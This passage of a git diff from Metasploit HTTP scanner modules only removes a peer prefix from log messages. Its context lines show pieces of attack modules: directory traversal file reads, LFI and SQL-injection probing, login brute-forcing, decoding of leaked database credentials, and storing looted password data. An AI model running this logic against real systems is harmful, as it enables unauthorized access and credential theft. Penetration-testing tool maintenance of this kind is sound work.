::ArgumentError - vprint_error("#{peer} - Unable to Connect") + vprint_error("Unable to Connect") return rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") + vprint_error("Timeout error") return end diff --git a/modules/auxiliary/scanner/http/joomla_plugins.rb b/modules/auxiliary/scanner/http/joomla_plugins.rb index a199aef541..dee21277e9 100644 --- a/modules/auxiliary/scanner/http/joomla_plugins.rb +++ b/modules/auxiliary/scanner/http/joomla_plugins.rb @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary tpath += '/' end - vprint_status("#{peer} - Checking for interesting plugins") + vprint_status("Checking for interesting plugins") res = send_request_cgi({ 'uri' => tpath, 'method' => 'GET' @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary nsize = res.body.size if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/<h1>Joomla! Administration Login<\/h1>/ and osize != nsize) - print_good("#{peer} - Plugin: #{tpath}#{papp} ") + print_good("Plugin: #{tpath}#{papp} ") report_note( :host => ip, :port => rport, @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary ) if (papp =~/passwd/ and res.body =~/root/) - print_good("#{peer} - Vulnerability: Potential LFI") + print_good("Vulnerability: Potential LFI") report_web_vuln( :host => ip, :port => rport, @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary :name => 'Local File Inclusion' ) elsif (res.body =~/SQL syntax/) - print_good("#{peer} - Vulnerability: Potential SQL Injection") + print_good("Vulnerability: Potential SQL Injection") report_web_vuln( :host => ip, :port => rport, @@ -105,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary :name => 'SQL Injection' ) elsif (papp =~/>alert/ and res.body =~/>alert/) - print_good("#{peer} - Vulnerability: Potential XSS") + print_good("Vulnerability: Potential XSS") report_web_vuln( :host => ip, :port => rport, @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) if (res1.code == 200) - print_good("#{peer} - Page: #{tpath}index.php?option=com_#{pages}") + print_good("Page: #{tpath}index.php?option=com_#{pages}") report_note( :host => ip, :port => datastore['RPORT'], @@ -139,7 +139,7 @@ class Metasploit3 < Msf::Auxiliary :update => :unique_data ) else - vprint_error("#{peer} - Page: #{tpath}index.php?option=com_#{pages} gave a #{res1.code} response") + vprint_error("Page: #{tpath}index.php?option=com_#{pages} gave a #{res1.code} response") end end elsif (res.code == 403) @@ -156,13 +156,13 @@ class Metasploit3 < Msf::Auxiliary return rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") + vprint_error("SSL error") return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - vprint_error("#{peer} - Unable to Connect") + vprint_error("Unable to Connect") return rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") + vprint_error("Timeout error") return end diff --git a/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb b/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb index 9748b7f676..3d6acc979a 100644 --- a/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb +++ b/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb @@ -48,17 +48,17 @@ class Metasploit3 < Msf::Auxiliary def get_users users = nil - vprint_status("#{peer} - Reading users from master...") + vprint_status("Reading users from master...") res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'ReadUsersFromMasterServlet')) if !res - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") elsif res.code == 404 - vprint_error("#{peer} - Could not find 'ReadUsersFromMasterServlet'") + vprint_error("Could not find 'ReadUsersFromMasterServlet'") elsif res.code == 200 && res.body =~ /<discoverydata>(.+)<\/discoverydata>/ users = res.body.scan(/<discoverydata>(.*?)<\/discoverydata>/) - vprint_good("#{peer} - Found #{users.length} users") + vprint_good("Found #{users.length} users") else - vprint_error("#{peer} - Could not find any users") + vprint_error("Could not find any users") end users end @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary ] ) - vprint_status("#{peer} - Parsing user data...") + vprint_status("Parsing user data...") users.each do |user| record = parse_user_data(user.to_s) next if record.join.empty? @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Auxiliary cred_table << [user, pass, hash, role, mail, salt] if pass - print_status("#{peer} - Found weak credentials (#{user}:#{pass})") + print_status("Found weak credentials (#{user}:#{pass})") credential_data = { origin_type: :service, module_fullname: self.fullname, diff --git a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb index 8774079b5d..77d6dc7091 100644 --- a/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb +++ b/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb @@ -51,7 +51,7 @@ class Metasploit3 < Msf::Auxiliary peer = "#{ip}:#{rport}" fname = datastore['FILE'] - print_status("#{peer} - Reading '#{datastore['FILE']}'") + print_status("Reading '#{datastore['FILE']}'") traverse = "../" * datastore['DEPTH'] res = send_request_cgi({ 'method' => 'GET', @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 500 and res.body =~ /Error report/ - print_error("#{peer} - Cannot obtain '#{fname}', here are some possible reasons:") + print_error("Cannot obtain '#{fname}', here are some possible reasons:") print_error("\t1. File does not exist.") print_error("\t2. The server does not have any patches deployed.") print_error("\t3. Your 'DEPTH' option isn't deep enough.") @@ -80,10 +80,10 @@ class Metasploit3 < Msf::Auxiliary ) vprint_line(data) - print_good("#{peer} - #{fname} stored as '#{p}'") + print_good("#{fname} stored as '#{p}'") else - print_error("#{peer} - Fail to obtain file for some unknown reason") + print_error("Fail to obtain file for some unknown reason") end end diff --git a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb index a0a33b9188..8a5734b6b9 100644 --- a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb +++ b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb @@ -132,17 +132,17 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw('uri' => uri) unless res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return file_size end if res.code == 404 - vprint_error("#{peer} - You got a 404. URI must be a valid resource.") + vprint_error("You got a 404. URI must be a valid resource.") return file_size end file_size = res.headers['Content-Length'].to_i - vprint_status("#{peer} - File length: #{file_size} bytes") + vprint_status("File length: #{file_size} bytes") return file_size }.call diff --git a/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb index 6644b0b7d4..5f7bb5fc2b 100644 --- a/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body !~ /404\ File\ Not\ Found/ - print_good("#{peer} - Request may have succeeded on file #{file}") + print_good("Request may have succeeded on file #{file}") report_web_vuln({ :host => rhost, :port => rport, @@ -75,9 +75,9 @@ class Metasploit3 < Msf::Auxiliary }) loot = store_loot("lfi.data","text/plain", rhost, res.body, file) - vprint_good("#{peer} - File #{file} downloaded to: #{loot}") + vprint_good("File #{file} downloaded to: #{loot}") elsif res and res.code - vprint_error("#{peer} - Attempt returned HTTP error #{res.code} when trying to access #{file}") + vprint_error("Attempt returned HTTP error #{res.code} when trying to access #{file}") end end @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Auxiliary user = datastore['USERNAME'] pass = datastore['PASSWORD'] - vprint_status("#{peer} - Trying to login with #{user} / #{pass}") + vprint_status("Trying to login with #{user} / #{pass}") # test login begin @@ -100,14 +100,14 @@ class Metasploit3 < Msf::Auxiliary return :abort if (res.code == 404) if [200, 301, 302].include?(res.code) - vprint_good("#{peer} - Successful login #{user}/#{pass}") + vprint_good("Successful login #{user}/#{pass}") else - vprint_error("#{peer} - No successful login possible with #{user}/#{pass}") + vprint_error("No successful login possible with #{user}/#{pass}") return :abort end rescue ::Rex::ConnectionError - vprint_error("#{peer} - Failed to connect to the web server") + vprint_error("Failed to connect to the web server") return :abort end diff --git a/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb b/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb index bc2663f8f3..de18f8805b 100644 --- a/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb +++ b/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb @@ -51,7 +51,7 @@ class Metasploit4 < Msf::Auxiliary md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase message = md5 + record - print_status("#{peer} - Retrieving the file contents") + print_status("Retrieving the file contents") res = send_request_cgi( { @@ -66,9 +66,9 @@ class Metasploit4 < Msf::Auxiliary loot = $1 f = ::File.basename(datastore['RFILE']) path = store_loot('novell.filereporter.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE']) - print_status("#{peer} - #{datastore['RFILE']} saved in #{path}") + print_status("#{datastore['RFILE']} saved in #{path}") else - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") end end diff --git a/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb b/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb index 844c503987..cabefe1b8f 100644 --- a/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb +++ b/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb @@ -51,7 +51,7 @@ class Metasploit4 < Msf::Auxiliary md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase message = md5 + record - print_status("#{peer} - Retrieving the file contents") + print_status("Retrieving the file contents") res = send_request_cgi( { @@ -66,9 +66,9 @@ class Metasploit4 < Msf::Auxiliary loot = res.body f = ::File.basename(datastore['RFILE']) path = store_loot('novell.filereporter.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE']) - print_status("#{peer} - #{datastore['RFILE']} saved in #{path}") + print_status("#{datastore['RFILE']} saved in #{path}") else - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") end end diff --git a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb index 49e1d33495..6bcc2dcb1e 100644 --- a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb +++ b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb @@ -92,13 +92,13 @@ class Metasploit3 < Msf::Auxiliary 'headers' => { "Authorization" => "NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw=="} }) rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") + vprint_error("SSL error") return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - vprint_error("#{peer} - Unable to Connect") + vprint_error("Unable to Connect") return rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") + vprint_error("Timeout error") return end diff --git a/modules/auxiliary/scanner/http/openmind_messageos_login.rb b/modules/auxiliary/scanner/http/openmind_messageos_login.rb index f78d63b8c2..3402e97dd7 100644 --- a/modules/auxiliary/scanner/http/openmind_messageos_login.rb +++ b/modules/auxiliary/scanner/http/openmind_messageos_login.rb @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login brute force...") + print_status("Starting login brute force...") each_user_pass do |user, pass| do_login(user, pass) end @@ -59,15 +59,15 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return false end if (res and res.code == 302 and res.headers['Location'] and res.headers['Location'].include?("/provision/index.php")) - vprint_good("#{peer} - Running OpenMind Message-OS Provisioning portal...") + vprint_good("Running OpenMind Message-OS Provisioning portal...") return true else - vprint_error("#{peer} - Application is not OpenMind. Module will not continue.") + vprint_error("Application is not OpenMind. Module will not continue.") return false end end @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( { @@ -116,12 +116,12 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return :abort end if (res and res.code == 302 and res.headers['Location'].include?("frameset")) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred( ip: rhost, port: rport, @@ -132,7 +132,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end diff --git a/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb b/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb index fb87ec82e4..4d69c421a2 100644 --- a/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb +++ b/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb @@ -53,25 +53,25 @@ class Metasploit3 < Msf::Auxiliary }) if res.nil? or res.body.empty? - vprint_error("#{peer} - No content retrieved") + vprint_error("No content retrieved") return end if res.code == 404 - vprint_error("#{peer} - File not found") + vprint_error("File not found") return end if res.code == 200 creds = "" - vprint_status("#{peer} - String received: #{res.body.to_s}") unless res.body.blank? + vprint_status("String received: #{res.body.to_s}") unless res.body.blank? res.body.to_s.split(",").each do|c| i = c.to_i ^ 0x50 creds += i.chr end - print_good("#{peer} - Credentials decoded: #{creds}") unless creds.empty? + print_good("Credentials decoded: #{creds}") unless creds.empty? end end diff --git a/modules/auxiliary/scanner/http/oracle_ilom_login.rb b/modules/auxiliary/scanner/http/oracle_ilom_login.rb index bc29b6d04c..2f1167132c 100644 --- a/modules/auxiliary/scanner/http/oracle_ilom_login.rb +++ b/modules/auxiliary/scanner/http/oracle_ilom_login.rb @@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login brute force...") + print_status("Starting login brute force...") each_user_pass do |user, pass| do_login(user, pass) end @@ -57,15 +57,15 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return false end if (res and res.code == 200 and res.headers['Server'].include?("Oracle-ILOM-Web-Server") and res.body.include?("Integrated Lights Out Manager")) - vprint_good("#{peer} - Running Oracle Integrated Lights Out Manager portal...") + vprint_good("Running Oracle Integrated Lights Out Manager portal...") return true else - vprint_error("#{peer} - Application is not Oracle ILOM. Module will not continue.") + vprint_error("Application is not Oracle ILOM. Module will not continue.") return false end end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( { @@ -117,12 +117,12 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return :abort end if (res and res.code == 200 and res.body.include?("/iPages/suntab.asp") and res.body.include?("SetWebSessionString")) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred( ip: rhost, port: rport, @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end diff --git a/modules/auxiliary/scanner/http/pocketpad_login.rb b/modules/auxiliary/scanner/http/pocketpad_login.rb index 8aed527ef6..f1107f89a4 100644 --- a/modules/auxiliary/scanner/http/pocketpad_login.rb +++ b/modules/auxiliary/scanner/http/pocketpad_login.rb @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login bruteforce...") + print_status("Starting login bruteforce...") each_user_pass do |user, pass| do_login(user, pass) end @@ -50,15 +50,15 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return false end if res && res.code == 200 && res.headers['Server'] && res.headers['Server'].include?("Smeagol") && res.body.include?("PocketPAD") - vprint_good("#{peer} - Running PocketPAD application ...") + vprint_good("Running PocketPAD application ...") return true else - vprint_error("#{peer} - Application is not PocketPAD. Module will not continue.") + vprint_error("Application is not PocketPAD. Module will not continue.") return false end end @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( { @@ -107,12 +107,12 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return :abort end if (res && res.code == 200 && res.body.include?("Home Page") && res.headers['Server'] && res.headers['Server'].include?("Smeagol")) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred( ip: rhost, port: rport, @@ -123,7 +123,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end end diff --git a/modules/auxiliary/scanner/http/radware_appdirector_enum.rb b/modules/auxiliary/scanner/http/radware_appdirector_enum.rb index 8cf4fdc12f..abcb16ce3f 100644 --- a/modules/auxiliary/scanner/http/radware_appdirector_enum.rb +++ b/modules/auxiliary/scanner/http/radware_appdirector_enum.rb @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login brute force...") + print_status("Starting login brute force...") each_user_pass do |user, pass| do_login(user, pass) end @@ -63,15 +63,15 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed, Aborting") + vprint_error("HTTP Connection Failed, Aborting") return false end if (res and res.headers['Server'] and res.headers['Server'].include?("Radware-web-server")) - vprint_good("#{peer} - Running Radware portal...") + vprint_good("Running Radware portal...") return true else - vprint_error("#{peer} - Application is not Radware. Module will not continue.") + vprint_error("Application is not Radware. Module will not continue.") return false end end @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( { @@ -116,12 +116,12 @@ class Metasploit3 < Msf::Auxiliary 'authorization' => basic_auth(user,pass) }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed, Aborting") + vprint_error("HTTP Connection Failed, Aborting") return :abort end if (res and res.code == 302 and res.headers['Location'].include?('redirectId')) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred( ip: rhost, port: rport, @@ -132,7 +132,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end diff --git a/modules/auxiliary/scanner/http/rips_traversal.rb b/modules/auxiliary/scanner/http/rips_traversal.rb index 2cc3915992..2b42cb8c54 100644 --- a/modules/auxiliary/scanner/http/rips_traversal.rb +++ b/modules/auxiliary/scanner/http/rips_traversal.rb @@ -73,9 +73,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded") + print_error("Nothing was downloaded") end end end diff --git a/modules/auxiliary/scanner/http/s40_traversal.rb b/modules/auxiliary/scanner/http/s40_traversal.rb index 3cea0a550b..49fa51058f 100644 --- a/modules/auxiliary/scanner/http/s40_traversal.rb +++ b/modules/auxiliary/scanner/http/s40_traversal.rb @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary t = "/.." * datastore['DEPTH'] - vprint_status("#{peer} - Retrieving #{datastore['FILE']}") + vprint_status("Retrieving #{datastore['FILE']}") # No permission to access.log or proc/self/environ, so this is all we do :-/ uri = normalize_uri(uri, 'index.php') @@ -58,13 +58,13 @@ class Metasploit3 < Msf::Auxiliary }) if not res - vprint_error("#{peer} - Server timed out") + vprint_error("Server timed out") elsif res and res.body =~ /Error 404 requested page cannot be found/ - vprint_error("#{peer} - Either the file doesn't exist, or you don't have the permission to get it") + vprint_error("Either the file doesn't exist, or you don't have the permission to get it") else # We don't save the body by default, because there's also other junk in it. # But we still have a SAVE option just in case - print_good("#{peer} - #{datastore['FILE']} retrieved") + print_good("#{datastore['FILE']} retrieved") vprint_line(res.body) if datastore['SAVE'] @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary res.body, ::File.basename(datastore['FILE']) ) - print_good("#{peer} - File saved as: #{p}") + print_good("File saved as: #{p}") end end end diff --git a/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb b/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb index f3f7d1d534..64f8ba1137 100644 --- a/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb +++ b/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary filename = datastore['FILE'] filename = filename[1, filename.length] if filename =~ /^\// - vprint_status("#{peer} - Retrieving file #{datastore['FILE']}") + vprint_status("Retrieving file #{datastore['FILE']}") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "workorder", "FileDownload.jsp"), @@ -61,9 +61,9 @@ class Metasploit3 < Msf::Auxiliary # The "Loding domain list To login AD authentication or local Authentication" string is returned in the response on a fixed version (build 9111) if res && res.code == 200 if res.body =~ /The File was not found/ - vprint_error("#{peer} - Vulnerable server, but the file does not exist!") + vprint_error("Vulnerable server, but the file does not exist!") elsif res.body =~ /Loding domain list To login AD authentication or local Authentication/ - vprint_error("#{peer} - The installed version of ManageEngine ServiceDesk Plus is not vulnerable!") + vprint_error("The installed version of ManageEngine ServiceDesk Plus is not vulnerable!") else p = store_loot( 'manageengine.servicedeskplus', @@ -72,10 +72,10 @@ class Metasploit3 < Msf::Auxiliary res.body, filename ) - print_good("#{peer} - File saved in: #{p}") + print_good("File saved in: #{p}") end else - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") end end end diff --git a/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb b/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb index 093251a16e..c7f90ebff3 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_49152_exposure.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary res.body.to_s, 'IPMIdevicedesc.xml' ) - print_good("#{peer} - Stored the device description XML in #{path}") + print_good("Stored the device description XML in #{path}") return true else return false @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless is_supermicro? - vprint_error("#{peer} - This does not appear to be a Supermicro IPMI controller") + vprint_error("This does not appear to be a Supermicro IPMI controller") return end @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Auxiliary next unless res unless res.code == 200 && res.body.length > 0 - vprint_status("#{peer} - Request for #{uri} resulted in #{res.code}") + vprint_status("Request for #{uri} resulted in #{res.code}") next end @@ -97,7 +97,7 @@ class Metasploit3 < Msf::Auxiliary res.body.to_s, uri.split('/').last ) - print_good("#{peer} - Password data from #{uri} stored to #{path}") + print_good("Password data from #{uri} stored to #{path}") end end diff --git a/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb b/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb index 206f7f416f..26cd5777e9 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_cgi_scanner.rb @@ -119,18 +119,18 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - vprint_status("#{peer} - Checking if it's a Supermicro IPMI web interface...") + vprint_status("Checking if it's a Supermicro IPMI web interface...") if is_supermicro? - vprint_good("#{peer} - Supermicro IPMI web interface found") + vprint_good("Supermicro IPMI web interface found") else - vprint_error("#{peer} - Supermicro IPMI web interface not found") + vprint_error("Supermicro IPMI web interface not found") return end - vprint_status("#{peer} - Checking CVE-2013-3621 (login.gi Buffer Overflow) ...") + vprint_status("Checking CVE-2013-3621 (login.gi Buffer Overflow) ...") result = check_login if result - print_good("#{peer} - Vulnerable to CVE-2013-3621 (login.cgi Buffer Overflow)") + print_good("Vulnerable to CVE-2013-3621 (login.cgi Buffer Overflow)") report_vuln({ :host => rhost, :port => rport, @@ -140,10 +140,10 @@ class Metasploit3 < Msf::Auxiliary }) end - vprint_status("#{peer} - Checking CVE-2013-3623 (close_window.gi Buffer Overflow) ...") + vprint_status("Checking CVE-2013-3623 (close_window.gi Buffer Overflow) ...") result = check_close_window if result - print_good("#{peer} - Vulnerable to CVE-2013-3623 (close_window.cgi Buffer Overflow)") + print_good("Vulnerable to CVE-2013-3623 (close_window.cgi Buffer Overflow)") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb index d7873f017b..b7a87ad514 100644 --- a/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb +++ b/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary travs << "../" * datastore['DEPTH'] travs << file - print_status("#{peer} - Retrieving file contents...") + print_status("Retrieving file contents...") res = send_request_cgi({ "uri" => "/cgi/url_redirect.cgi", @@ -111,26 +111,26 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - print_status("#{peer} - Checking if it's a #{APP_NAME}....") + print_status("Checking if it's a #{APP_NAME}....") if is_supermicro? - print_good("#{peer} - Check successful") + print_good("Check successful") else - print_error("#{peer} - #{APP_NAME} not found") + print_error("#{APP_NAME} not found") return end - print_status("#{peer} - Login into the #{APP_NAME}...") + print_status("Login into the #{APP_NAME}...") session = login if session.nil? - print_error("#{peer} - Failed to login, check credentials.") + print_error("Failed to login, check credentials.") return else - print_good("#{peer} - Login successful, session: #{session}") + print_good("Login successful, session: #{session}") end contents = read_file(datastore['FILEPATH'], session) if contents.nil? - print_error("#{peer} - File not downloaded") + print_error("File not downloaded") return end @@ -142,7 +142,7 @@ class Metasploit3 < Msf::Auxiliary contents, file_name ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") end end diff --git a/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb b/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb index ad2a235717..015e81013f 100644 --- a/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary uri = target_uri.path peer = "#{ip}:#{rport}" - vprint_status("#{peer} - Retrieving cookie") + vprint_status("Retrieving cookie") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "") @@ -57,10 +57,10 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 200 session = res.get_cookies else - vprint_error("#{peer} - Server returned #{res.code.to_s}") + vprint_error("Server returned #{res.code.to_s}") end - vprint_status("#{peer} - Logging in as user [ #{datastore['USER']} ]") + vprint_status("Logging in as user [ #{datastore['USER']} ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 